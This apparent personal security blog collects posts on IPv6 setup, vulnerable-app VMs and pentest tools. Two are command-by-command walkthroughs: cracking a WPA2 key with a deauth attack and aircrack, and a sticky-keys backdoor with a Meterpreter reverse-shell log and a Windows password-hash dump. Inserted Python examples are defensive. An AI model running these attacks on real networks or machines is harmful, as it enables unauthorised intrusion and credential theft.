owaspbwa – web testing fast-track

20 09 2013

WOW – has it really been since January !!!??? – time flies when you are having fun.

Just wanted to share a nice little project I came across when looking for vulnerable web apps etc.

Many many thanks to Mandiant for sponsoring the bundling of so many of these into the one VM. Means you don't have to spend the day setting up each one before you can start playing with them.

https://code.google.com/p/owaspbwa/

https://code.google.com/p/owaspbwa/wiki/UserGuide

All the favorites are there, as well as plenty I hadn’t seen before.

 

Applications designed for learning which guide the user to specific, intentional vulnerabilities.

 

One tip though, if you download the 1.1 VM, make sure you replace the tomcat init script as identified in this BR: https://code.google.com/p/owaspbwa/issues/detail?id=83 otherwise anything that relies on tomcat (WebGoat etc) won't work & will instead just give you the following warning:

503 - Service Temporarily Unavailable






IPv6 Adventures – Part 1

31 01 2012

So – I decided it was finally time to finish implementing & document my IPv6 config – mainly so I remember how I did it, but also to help others on their IPv6 journey to the interwebs

High Level:

– Get an IPv6 subnet (duh) – This will depend on your scenario, several ISPs offer native IPv6 (Internode) – mine does not (Telstra Bigpond).
– Configure a router / firewall / host with IPv6 address from your subnet
– Configure an IPv6 DNS address on that device to resolve AAAA records
– Bask in the IPv6ness of the interwebs – it looks eerily like the IPv4ness of the interwebs.

My Journey:

– I was already running the awesome Astaro for my border FW & home – which has great IPv6 support built in.
– I signed up for a subnet with Freenet6 / gogonet – http://gogonet.gogo6.com/page/freenet6-ipv6-services

*STOP HERE*

Ok, before we move on with turning the IPv6 up – you need to plan out a couple of things.

– Your IPv6 address is PUBLIC – it is reachable from the outside world, consider the consequences & firewall appropriately, also turn off NAT for IPv6 if your FW supports it – it will be a PITA when testing with your web browser & getting a different IPv6 address than you expect.

– IPv6 Subnetting – depending on the provider, you will be allocated something like a /56 subnet (4722366482869645213696 host IPs — SERIOUSLY)

I broke my /56 up into /64 subnets for each zone (INSIDE / DMZ1 / DMZ2 / DARKNET) – still giving me 256 subnets containing 18446744073709551616 host addresses each …. I don't think I'm going to run out of addresses any time soon.

I could have broken em up into /96 subnets, giving me 1099511627776 subnets with 4294967296 (4 billion) hosts in each …. but really, when we are talking numbers like this, it's just academic – use whatever fits your network design. I figured that I'm not going to ever need 256 subnets or more, so I just broke it up there, and /64 is a nice subnet mask boundary.

So what does this actually look like ?

2406:A000:F006:A400::/56 – My allocated IPv6 subnet from my tunnel broker

You can get some good info about your subnet using tools like http://www.gestioip.net/cgi-bin/subnet_calculator.cgi

IP address: 2406:a000:f006:a400:0000:0000:0000:0000
type: GLOBAL-UNICAST
network: 2406:a000:f006:a400::
Prefix length: 56
Prefix address: ffff:ffff:ffff:ff00:0000:0000:0000:0000
address range start: 2406:a000:f006:a400:0000:0000:0000:0000
address range end: 2406:a000:f006:a4ff:ffff:ffff:ffff:ffff
total IP addresses: 4722366482869645213696

As I mentioned above, I carved out 4x /64 subnets from this.

You can do it offline, but I cheated & used this IPv6 subnet calc – http://www.subnetonline.com/pages/subnet-calculators/ipv6-subnet-calculator.php

Here we go – nice & neat /64 subnets – I'm using 4 from the possible 256.

2406:a000:f006:a400::/64
2406:a000:f006:a401::/64
2406:a000:f006:a402::/64
2406:a000:f006:a403::/64

ffff:ffff:ffff:ffff:0000:0000:0000:0000 – /64 Mask
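
The same plan worked out offline with Python's standard ipaddress module. This is an added example, not part of the original post: the function names and the order in which the four zones take their /64s are assumptions. It also maps an address back to its zone, which is handy when checking that a firewall rule points at the subnet you meant.

```python
import ipaddress

# The /56 allocation and the zone names come from the post.
# Which zone gets which /64 is an assumption made for this example.
ALLOCATION = ipaddress.ip_network("2406:a000:f006:a400::/56")
ZONES = ("INSIDE", "DMZ1", "DMZ2", "DARKNET")


def plan_zones(allocation, zones, new_prefix=64):
    """Give each zone the next free subnet of length new_prefix."""
    if new_prefix < allocation.prefixlen:
        raise ValueError("zone prefix must not be shorter than the allocation")
    available = 2 ** (new_prefix - allocation.prefixlen)
    if len(zones) > available:
        raise ValueError(f"{len(zones)} zones wanted, only {available} subnets exist")
    subnets = allocation.subnets(new_prefix=new_prefix)  # lazy generator
    return {zone: next(subnets) for zone in zones}


def zone_of(address, plan):
    """Return the zone holding address, or None when no zone covers it."""
    addr = ipaddress.ip_address(address)
    for zone, net in plan.items():
        if addr in net:
            return zone
    return None


def unused_subnets(allocation, plan, new_prefix=64):
    """How many subnets of length new_prefix are still unassigned."""
    return 2 ** (new_prefix - allocation.prefixlen) - len(plan)


if __name__ == "__main__":
    plan = plan_zones(ALLOCATION, ZONES)
    for zone, net in plan.items():
        print(f"{zone:8} {net}  ({net.num_addresses} addresses)")
    print("unassigned /64s:", unused_subnets(ALLOCATION, plan))
    # An address inside the /56 but outside every zone should match no rule.
    print(zone_of("2406:a000:f006:a404::1", plan))
```

An address that falls inside the /56 but in none of the planned zones returns None, which is the case a default-deny rule has to cover.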

Now that we have our subnets planned out, we can continue on to implementation

Next Time ….





WPA2 network cracking

27 09 2011

So – everyone has cracked WEP & everyone knows it has a couple of seconds security around it.

This time I am getting connected to a WPA2 / PSK protected network.

Couple of things you will need

  • Backtrack (I am using 5r1 )
  • A wordlist – google is your friend here but there is a 3169 word list at /pentest/passwords/john/password.lst to get you started
  • A wireless card
  • A WPA or WPA2 network protected with a pre-shared key (your own of course)

==Drop the interface into monitor mode==

root@bt:~# airmon-ng start wlan0

Interface    Chipset        Driver

wlan0        Zydas zd1211    zd1211rw - [phy1]
(monitor mode enabled on mon0)

==Find your target wireless network==

root@bt:~# airodump-ng mon0

 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

 38:E7:D8:AD:B2:0E    0       61        0    0  11  54e  WPA2 CCMP   PSK  Wireless

==Start capturing==

root@bt:~# airodump-ng mon0 --channel 11 --bssid 38:E7:D8:AD:B2:0E -w /tmp/wpa2

 CH 11 ][ BAT: 3 hours 51 mins ][ Elapsed: 7 mins ][ 2011-09-26 21:24                                         

 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID                           

 38:E7:D8:AD:B2:0E    0 100     4319       83    0  11  54e  WPA2 CCMP   PSK  Wireless                        

 BSSID              STATION            PWR   Rate    Lost  Packets  Probes                                    

 38:E7:D8:AD:B2:0E  00:03:6D:F4:F8:86    0    1 -48      0       81  Wireless

So now that you are capturing the traffic, we can either wait for a user to connect, or deauth an existing one….

==Deauth an existing user to get the 4 way handshake==

root@bt:~# aireplay-ng -0 1 -a 38:E7:D8:AD:B2:0E -c 00:03:6D:F4:F8:86 mon0
21:25:49  Waiting for beacon frame (BSSID: 38:E7:D8:AD:B2:0E) on channel 11
21:25:50  Sending 64 directed DeAuth. STMAC: [00:03:6D:F4:F8:86] [62|63 ACKs]
root@bt:~#

Once the user is connected, you see the WPA handshake in the top right corner

CH 11 ][ BAT: 3 hours 43 mins ][ Elapsed: 1 min ][ 2011-09-26 21:27 ][ WPA handshake: 38:E7:D8:AD:B2:0E

BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

38:E7:D8:AD:B2:0E    0  96      807       28    0  11  54e  WPA2 CCMP   PSK  Wireless

BSSID              STATION            PWR   Rate    Lost  Packets  Probes

38:E7:D8:AD:B2:0E  00:03:6D:F4:F8:86    0   54 - 6      0      161

Now, the best bit of this over WEP cracking is that we no longer need to be anywhere near the network. The cracking is done offline.

==The easy way (No guarantee this will work)==

There are two ways to tackle this – at the end of the day, you need to brute force the password, but having a decent wordlist gives you a huge advantage over a,b,c,d 1,2,3,4 etc.

This is the secret sauce – without a decent wordlist, you got nothing.

For this example we will just use the one that comes with JTR in BT

root@bt:~# aircrack-ng -w /pentest/passwords/john/password.lst -b 38:E7:D8:AD:B2:0E /tmp/wpa*.cap
Opening /tmp/wpa2-01.cap
Opening /tmp/wpa2-02.cap
Reading packets, please wait...

                                 Aircrack-ng 1.1 r1904

                   [00:00:00] 48 keys tested (489.60 k/s)

                           KEY FOUND! [ sunshine ]

      Master Key     : 02 A7 BC 5F 24 67 CA 2A B5 FC F0 01 1E D5 9B 2C 
                       8B 42 A5 A8 C6 55 6B 33 4A 09 8B 07 84 D3 C0 1D 

      Transient Key  : 3F 56 FD 2B 2F CE FA D9 55 14 84 2F 53 31 42 BF 
                       8C FE 11 78 9F 51 48 33 97 62 E1 C6 D7 B1 9C 6C 
                       6B D7 5A 1C 11 22 3F 0B 7E 1D 42 51 5E 55 F4 28 
                       D2 3A DB 75 81 DD 4E BB 64 51 29 86 AA 55 06 7B 

      EAPOL HMAC     : 17 6E 91 77 A2 A9 F1 C5 6F 33 02 4D 59 64 8A 9B 
root@bt:~#

BOOHYA – our WPA2 PSK is sunshine

==The hard way (but will EVENTUALLY find it)==

root@bt:~# /pentest/passwords/john/john --stdout --incremental:all | aircrack-ng -b 38:E7:D8:AD:B2:0E -w - /tmp/wpa2*.cap
Opening /tmp/wpa2-01.cap
Opening /tmp/wpa2-02.cap
Reading packets, please wait...

                                 Aircrack-ng 1.1 r1904

                   [00:00:22] 11484 keys tested (534.50 k/s)

                           KEY FOUND! [ sunshine ]

      Master Key     : 02 A7 BC 5F 24 67 CA 2A B5 FC F0 01 1E D5 9B 2C 
                       8B 42 A5 A8 C6 55 6B 33 4A 09 8B 07 84 D3 C0 1D 

      Transient Key  : 3F 56 FD 2B 2F CE FA D9 55 14 84 2F 53 31 42 BF 
                       8C FE 11 78 9F 51 48 33 97 62 E1 C6 D7 B1 9C 6C 
                       6B D7 5A 1C 11 22 3F 0B 7E 1D 42 51 5E 55 F4 28 
                       D2 3A DB 75 81 DD 4E BB 64 51 29 86 AA 55 06 7B 

      EAPOL HMAC     : 17 6E 91 77 A2 A9 F1 C5 6F 33 02 4D 59 64 8A 9B 
root@bt:~#

So that's it … no smoke … no mirrors … Get the capture of a handshake, then brute force the key from it 😀

Remember this the next time you are thinking of a PSK for your wireless router.

A good page to read about password strength & get a feel for what it takes to brute force different passwords is the Password Haystacks page by Steve Gibson (grc.com)
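
To put numbers on that when choosing your own PSK, here is a haystack-style estimate in Python. It is an added example, not from the original post: the function names and the five-entry wordlist are constructed for illustration, and the guess rate is the 534.50 k/s figure from the aircrack-ng run above.

```python
import string

# Guess rate read off the aircrack-ng run above (534.50 k/s, keys per second).
PAGE_RATE = 534.50
# Constructed stand-in for a dictionary such as password.lst (not the real file).
SAMPLE_WORDLIST = {"password", "12345678", "sunshine", "iloveyou", "trustno1"}
# Character classes a passphrase can draw on; together they are the 95
# printable ASCII characters a WPA2 passphrase may contain.
CLASSES = (string.ascii_lowercase, string.ascii_uppercase,
           string.digits, string.punctuation + " ")
SECONDS_PER_YEAR = 365.25 * 24 * 3600


def alphabet_size(psk):
    """Size of the smallest union of character classes that covers psk."""
    return sum(len(cls) for cls in CLASSES if any(ch in cls for ch in psk))


def search_space(psk):
    """Candidates an exhaustive search covers from the 8-character minimum
    up to the length of psk, using the alphabet psk draws on."""
    size = alphabet_size(psk)
    return sum(size ** n for n in range(8, len(psk) + 1))


def audit_psk(psk, wordlist=SAMPLE_WORDLIST, rate=PAGE_RATE):
    """Report whether psk falls to a dictionary and how long brute force takes."""
    if not 8 <= len(psk) <= 63 or not all(32 <= ord(c) <= 126 for c in psk):
        raise ValueError("a WPA2 passphrase is 8 to 63 printable ASCII characters")
    space = search_space(psk)
    return {
        "in_wordlist": psk in wordlist,
        "alphabet": alphabet_size(psk),
        "search_space": space,
        "worst_case_years": space / rate / SECONDS_PER_YEAR,
    }


if __name__ == "__main__":
    # Both passphrases are constructed samples; "sunshine" is the key from the post.
    for candidate in ("sunshine", "Sunshine-Over-Bondi-2011"):
        print(candidate, audit_psk(candidate))
```

The worst-case figure only matters when in_wordlist is False, and it assumes the CPU rate shown above; GPU-based tools test keys far faster, so read it as a relative measure between candidate passphrases.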





Disable Windows 7 IPv6 random temporary addresses

4 08 2011

One of the added security features with IPv6 addressing is “Temporary address interface identifiers”

https://isc.sans.edu/diary.html?storyid=10966

Many operating systems use the EUI-64 algorithm to generate IPv6 addresses. This algorithm derives the last 64 bits of the IPv6 address using the MAC address. Many see this as a privacy problem. The last half of your IP address will never change, and with MAC addresses being somewhat unique, the interface ID becomes close to a unique “cookie” identifying your system.

As a result, RFC3041 introduces “privacy enhanced” addresses which will change and are created by hashing the MAC address.

*NOTE: Default behaviour of Windows XP & Server 2003 does not use the randomization*

What this means from an administration perspective is that after every reboot, the IPv6 address that is presented to the network changes ….. which makes things like DNS / FW rules etc a nightmare to manage in a corporate / enterprise scenario where you really need to be able to have a stable addressing scheme.

I have a /52 IPv6 subnet through a tunnel broker. My border firewall terminates the tunnel & advertises the subnet on the inside interface for autoconfiguration (without having to configure DHCP)

So, let's break it down.

I get a /52 subnet, which is advertised to my internal machines.

aaaa:bbbb:cccc:dddd::/56

In normal configuration, by default in Windows 7 – it generates a randomized Link-local address (not based on the MAC)

Autoconfiguration Enabled . . . . : Yes
Physical Address. . . . . . . . . : 00-0C-29-88-9F-2A
Link-local IPv6 Address . . . . . : fe80::d95:67db:fba2:7dad%11(Preferred)

Using stateless autoconfiguration I get an IPv6 address from my FW, based on the Link-local address

IPv6 Address. . . . . . . . . . . : aaaa:bbbb:cccc:dddd:d95:67db:fba2:7dad(Preferred)

Excellent – we have a global / routable IPv6 address based on the host’s link local address which I can now use.

However, Windows isn't done yet, it also assigns a Temporary IPv6 address – which is used when accessing network resources. This Temporary address is only kept for a set period, and changes when the machine reboots – and here is the problem. How can I configure a firewall rule for this host to reach an external resource ?

Here is the result of several reboots:

Temporary IPv6 Address. . . . . . : aaaa:bbbb:cccc:dddd:a5cb:b012:16f0:6fa9
Temporary IPv6 Address. . . . . . : aaaa:bbbb:cccc:dddd:ec65:b6ca:abd6:1349
Temporary IPv6 Address. . . . . . : aaaa:bbbb:cccc:dddd:752b:87c:f84:a4d6
Temporary IPv6 Address. . . . . . : aaaa:bbbb:cccc:dddd:1031:46fd:cfd7:d88c
Temporary IPv6 Address. . . . . . : aaaa:bbbb:cccc:dddd:5883:7ef2:9c64:6eab
Temporary IPv6 Address. . . . . . : aaaa:bbbb:cccc:dddd:a400:251a:59:1cd6:bf0f

You can disable this & just use the interface based EUI-64 address by running the following commands.

Bring up a command prompt in administrator mode (Start -> All Programs -> Accessories -> Right click on Command Prompt, run as Administrator)

Then run these commands (should get OK response)

netsh interface ipv6 set privacy state=disabled store=active
netsh interface ipv6 set privacy state=disabled store=persistent
netsh interface ipv6 set global randomizeidentifiers=disabled store=active
netsh interface ipv6 set global randomizeidentifiers=disabled store=persistent

Restart your machine

Your machine should now get a stable IPv6 address based on the MAC address. You can now use this MAC-based address for DNS entries, FW rules etc & its access will remain consistent across reboots.

Autoconfiguration Enabled . . . . : Yes
Physical Address. . . . . . . . . : 00-0C-29-88-9F-2A
IPv6 Address. . . . . . . . . . . : aaaa:bbbb:cccc:dddd:20c:29ff:fe88:9f2a(Preferred)
Link-local IPv6 Address . . . . . : fe80::20c:29ff:fe88:9f2a%10(Preferred)

Excellent – we have a global / routable IPv6 address based on the host’s link local address which I can now use.

A note on the addressing – In this addressing mode, the 64-bit interface identifier is derived from its 48-bit MAC address. A MAC address 00:1D:BA:06:37:64 is turned into a 64-bit EUI-64 by inserting FF:FE in the middle: 00:1D:BA:FF:FE:06:37:64. As I “only” have a /52 assigned to me the whole MAC is not used, but the address is based on the last 5 octets.
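
The derivation can be checked against the ipconfig output above. The Python below is an added example, not part of the original post, and its function names are assumptions. Besides inserting FF:FE, the modified EUI-64 form used in IPv6 addresses flips the universal/local bit of the first octet, which is why the MAC 00-0C-29-88-9F-2A shows up as 20c:29ff:fe88:9f2a. The reverse function shows the privacy concern quoted earlier: the MAC can be read straight back out of such an address.

```python
import ipaddress


def mac_to_interface_id(mac):
    """Modified EUI-64: insert ff:fe mid-MAC and flip the universal/local bit."""
    octets = bytes.fromhex(mac.replace("-", "").replace(":", ""))
    if len(octets) != 6:
        raise ValueError("expected a 48-bit MAC address")
    eui = bytearray(octets[:3] + b"\xff\xfe" + octets[3:])
    eui[0] ^= 0x02  # universal/local bit
    return int.from_bytes(eui, "big")


def slaac_address(prefix, mac):
    """Address a host autoconfigures on a /64 prefix when randomization is off."""
    net = ipaddress.ip_network(prefix)
    if net.version != 6 or net.prefixlen != 64:
        raise ValueError("stateless autoconfiguration uses a /64 IPv6 prefix")
    return ipaddress.IPv6Address(int(net.network_address) | mac_to_interface_id(mac))


def recover_mac(address):
    """Return the MAC embedded in an EUI-64 based address, or None when the
    interface identifier does not have ff:fe in the middle (random or manual)."""
    addr = ipaddress.IPv6Address(address.split("%")[0])  # drop a zone id like %10
    iid = (int(addr) & (2 ** 64 - 1)).to_bytes(8, "big")
    if iid[3:5] != b"\xff\xfe":
        return None
    mac = bytearray(iid[:3] + iid[5:])
    mac[0] ^= 0x02
    return "-".join(f"{b:02X}" for b in mac)


if __name__ == "__main__":
    mac = "00-0C-29-88-9F-2A"  # Physical Address from the ipconfig output above
    print(slaac_address("fe80::/64", mac))                 # link-local
    print(slaac_address("aaaa:bbbb:cccc:dddd::/64", mac))  # the post's masked prefix
    # Addresses copied from the post: one EUI-64 based, one randomized.
    print(recover_mac("fe80::20c:29ff:fe88:9f2a%10"))
    print(recover_mac("fe80::d95:67db:fba2:7dad%11"))
```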





60seconds of physical access = p0wn3d windows machine

27 09 2010

So I came across some interesting articles about getting a shell with system priv on a windows box that you have physical access to …… sounds fun 😀

There are two ways to get this access using existing windows services, both involve replacing a helper service file with cmd.exe (or other exe, but we are just getting shell for now) and invoking the “helper” via key presses at the login screen.

Shift Key x5 – “Sticky Keys helper”

Most windows machines (Up to & Including Server 2008 / Windows 7 etc) will invoke the StickyKeys helper app when you hit shift 5 times, even at the login prompt.

Reboot your target with your favourite bootable image (backtrack is my choice, but you can use pretty much anything). Once you are in the distro of choice, you need to mount the target drive, back up the original file and copy in cmd.exe

Mount the drive (assuming it's NTFS) and do the file copying

root@bt:~# mkdir disk
root@bt:~# ntfs-3g /dev/sda1 ./disk
root@bt:~# cd disk
root@bt:~/disk# cd WINDOWS/system32
root@bt:~/disk/WINDOWS/system32# mv sethc.exe sethc.exe.old
root@bt:~/disk/WINDOWS/system32# cp cmd.exe sethc.exe
root@bt:~/disk/WINDOWS/system32# cd
root@bt:~# umount ./disk
root@bt:~# reboot

Of course, while you are at it, you may want to drop your favourite “network tools application” somewhere onto the target drive, so you have something fun to run in a minute, you “could” also setup a machine on the same segment as the target, with a handler ….. but what you do there is up to you.

This time when you are at your windows login screen, hit Shift 5 times and bingo – shell, with system priv

Now comes the fun part … with your networktool.exe you dropped earlier….

Ooooh calculator …. wonder what that does ….

……. somewhere on another part of the network …… not so far far away ……

msf exploit(handler) >
[*] 172.16.189.137:1029 Request received for /Arf3V...
[*] 172.16.189.137:1029 Staging connection for target rf3V received...
[*] Patching Target ID rf3V into DLL
[*] 172.16.189.137:1030 Request received for /Brf3V...
[*] 172.16.189.137:1030 Stage connection for target rf3V received...
[*] Meterpreter session 2 opened (172.16.189.138:443 -> 172.16.189.137:1030) at 2010-09-27 21:35:10 +1000
[*] Session ID 2 (172.16.189.138:443 -> 172.16.189.137:1030) processing InitialAutoRunScript '/migrate.rb'
[*] Current server process: networktool.exe (996)
[*] Migrating to lsass.exe...
[*] Migrating into process ID 684
[*] New server process: lsass.exe (684)

msf exploit(handler) > sessions -l

Active sessions
===============

Id  Type                   Information
--  ----                   -----------
2   meterpreter x86/win32  NT AUTHORITY\SYSTEM @ N00B-DB56488                                                   .137:1030

msf exploit(handler) > sessions -i 2
[*] Starting interaction with 2...

meterpreter > ipconfig

MS TCP Loopback interface
Hardware MAC: 00:00:00:00:00:00
IP Address  : 127.0.0.1
Netmask     : 255.0.0.0

AMD PCNET Family PCI Ethernet Adapter - Packet Scheduler Miniport
Hardware MAC: 00:0c:29:5c:38:31
IP Address  : 172.16.189.137
Netmask     : 255.255.255.0

meterpreter > sysinfo
Computer: N00B-DB56488C96
OS      : Windows XP (Build 2600, Service Pack 3).
Arch    : x86
Language: en_US
meterpreter > use priv
Loading extension priv...success.
meterpreter > hashdump
Administrator:500:921988ba001dc8e14a3b108f3fa6cb6d:e19ccf75ee54e06b06a5907af13cef42:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HelpAssistant:1000:ace3901423f8cc34767dbb3ebf316f88:b8491d9c56fc2d8caebdca5b86d96fee:::
SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:ff11f2628cb153e32a048dce2344c5ec:::
meterpreter >

Go Here: http://lmcrack.com/index.php

Enter captured hash: 921988ba001dc8e14a3b108f3fa6cb6d

Get Result: 921988BA001DC8E14A3B108F3FA6CB6D = P@ssw0rd

Login …… p0wn3d

Another way to achieve the same goal is with Utilman.exe & then using WindowsKey + U instead of Shift x5. Depending on the security settings locked down on the domain (GPOs) these may or may not work for you – only one way to find out.
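
From the defender's side, the swap described above leaves a simple trace: the helper binary has the same content as cmd.exe, and the renamed original may still sit beside it. The Python check below is an added example, not part of the original post. Its function names are assumptions, and the demo runs against a constructed directory of placeholder files rather than a real system32.

```python
import hashlib
import tempfile
from pathlib import Path

HELPERS = ("sethc.exe", "utilman.exe")  # the two logon-screen helpers named in the post
SHELLS = ("cmd.exe",)                   # what the post copies over the helper


def _sha256(path):
    return hashlib.sha256(path.read_bytes()).hexdigest()


def audit_helpers(system32):
    """Return (helper, finding) pairs for helpers that look tampered with."""
    # Windows file names are case-insensitive, so index them in lower case.
    files = {p.name.lower(): p for p in Path(system32).iterdir() if p.is_file()}
    shell_hashes = {_sha256(files[s]): s for s in SHELLS if s in files}
    findings = []
    for helper in HELPERS:
        if helper not in files:
            findings.append((helper, "missing"))
        else:
            digest = _sha256(files[helper])
            if digest in shell_hashes:
                findings.append((helper, "same content as " + shell_hashes[digest]))
        if helper + ".old" in files:
            findings.append((helper, "renamed original left beside it (.old)"))
    return findings


def build_constructed_system32(root, swapped):
    """Write placeholder files standing in for system32 (constructed test data)."""
    root = Path(root)
    (root / "cmd.exe").write_bytes(b"constructed cmd.exe bytes")
    (root / "Utilman.exe").write_bytes(b"constructed utilman bytes")
    if swapped:  # mirror the mv / cp steps shown in the post
        (root / "sethc.exe.old").write_bytes(b"constructed sethc bytes")
        (root / "sethc.exe").write_bytes(b"constructed cmd.exe bytes")
    else:
        (root / "sethc.exe").write_bytes(b"constructed sethc bytes")
    return root


def demo_findings(swapped):
    """Build the constructed directory in a temp folder and audit it."""
    with tempfile.TemporaryDirectory() as tmp:
        return audit_helpers(build_constructed_system32(tmp, swapped))


if __name__ == "__main__":
    print("clean  :", demo_findings(swapped=False))
    print("swapped:", demo_findings(swapped=True))
```

Comparing against cmd.exe only catches the exact swap shown here; checking the helpers against known-good hashes for the installed Windows build also catches other replacement binaries.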





PaulDotCom: Archives : Zen and The Art Of An Internal Penetration Testing Program

5 09 2010

Ok Ok …. I know I'm 2 years late to post this as a “new” presentation – but there is some interesting & valuable info in here about pentesting your internal network. It starts out pretty high level, but is a nice rounded overview on the reasons, methods & tools that you can use to penetration test your network. Hosted by CoreSecurity & presented by Paul Asadoorian from pauldotcom.

Part1:

• Phase I – Target identification
• Phase II – Detect OS & Services
• Phase III – Identify Vulnerabilities

Part2:

• Phase IV – Exploitation
• Phase V – Post-Exploitation
• Phase VI – Reporting

Part 1 has some great grounding information in penetration testing, examples in here for several tools (nmap, nessus, nbtscan etc) and also ways to link them together, eg, run an nmap scan across the network, identifying windows hosts listening on 445, use the nmap scripting engine to determine if they are vulnerable – and use that list of hosts in nessus or metasploit etc.

Part 2 contains more information on why should you exploit a machine, how to exploit etc, using both Metasploit & Core Impact. Some useful info on tasks to perform once you have compromised a host – automated info gathering, looking for sensitive data, gathering screenshots, video, sound recordings etc etc. This segment ends with some good tips on how to report this information to management, then some Q&A.

There is some great info in here, it's worth a look.

Part 1:

This webcast is Part I of a two part series I am doing in collaboration with Core Security Technologies. The presentation is full of tips, tricks, process, and practical knowledge about performing penetration testing within your own organization. Whether you are a third-party doing penetration tests or want to penetration test your internal network, this webcast is for you! In Part I I cover such topics as finding rogue access points, processes for creating a successful penetration testing program, identifying targets, and more! Information and resources are below:

via PaulDotCom: Archives.

===OR===

Zen and the Art of an Internal Penetration Testing Program Part I with Paul Asadoorian
Recording date: Wednesday, November 19, 2008 3:00 pm Eastern Standard Time (New York, GMT-05:00)
Panelist Information: Paul Asadoorian of PaulDotCom Security Weekly
Duration: 1 hour 9 minutes
Description:

Please join Core Security and Paul Asadoorian, founder of PaulDotCom Security Weekly, for a live webcast: “Zen and the Art of Maintaining an Internal Penetration Testing Program.”

During this webcast, Asadoorian will offer tips on successfully integrating penetration testing into your vulnerability management program. You’ll learn:

* How to determine if internal penetration testing is right for your organization
* What questions you should ask when planning a pen testing initiative
* How you can best pitch testing to other departments and gain permission from management
* What types of tests to run and how to address the process of dealing with compromised devices
* Which tips and tricks can help you carry out faster, more effective testing

Whether you’re considering rolling out an internal penetration testing program or need a refresher of best practices for your current testing initiatives, this webcast is sure to be time well-spent.

via Core Security: Recorded webcast

Part 2:

During the webcast, Paul Asadoorian of PaulDotCom Security Weekly will discuss best practices for automating your security testing initiatives. You’ll learn tips and tricks for tying vulnerability scanning, penetration testing and reporting into an efficient, repeatable testing process. Paul will demonstrate techniques for vulnerability identification and exploitation, including:

• Importing Nmap data into Nessus
• Using Nessus, and running nessuscmd to automate vulnerability scanning
• Importing results into Metasploit
• Running msfcli to automate penetration testing
• Importing Nmap & Nessus results into CORE IMPACT Pro
• Using Python to script tasks on compromised hosts with CORE IMPACT Pro

You’ll also get answers to questions such as, “How do I integrate password cracking into my testing?” and “What should I do once a host is compromised during a test?”

via Core Security: Recorded webcast





The Ethical Hacker Network – Maltego 3: First Look

5 09 2010

Recently read a great review on Maltego – it's a quick walk through on digging the internet for information on an individual, from just a name, to email addresses, photos to physical location & phone numbers – it's worth a read, and worth a download & play with the free version.

What is Maltego?

Maltego is an open source intelligence and forensics application. It will offer you timous mining and gathering of information as well as the representation of this information in a easy to understand format.

Maltego, developed by Roelof Temmingh, Andrew Macpherson and their team over at Paterva, is a premier information gathering tool that allows you to visualize and understand common trust relationships between entities of your choosing. Currently Maltego 3 is available for Windows and Linux. There is also an upcoming version for Apple users that has yet to be released.

Information gathering is a vital part of any penetration test or security audit, and it’s a process that demands patience, concentration and the right tool to be done correctly. In our case Maltego 3 is the tool for the job.

In this article we explore Maltego 3 and examine its fundamental features and a little hands-on with the newly designed version. If you haven’t already had a chance to upgrade to or pick up Maltego 3 you are missing out.

via The Ethical Hacker Network – Maltego 3: First Look.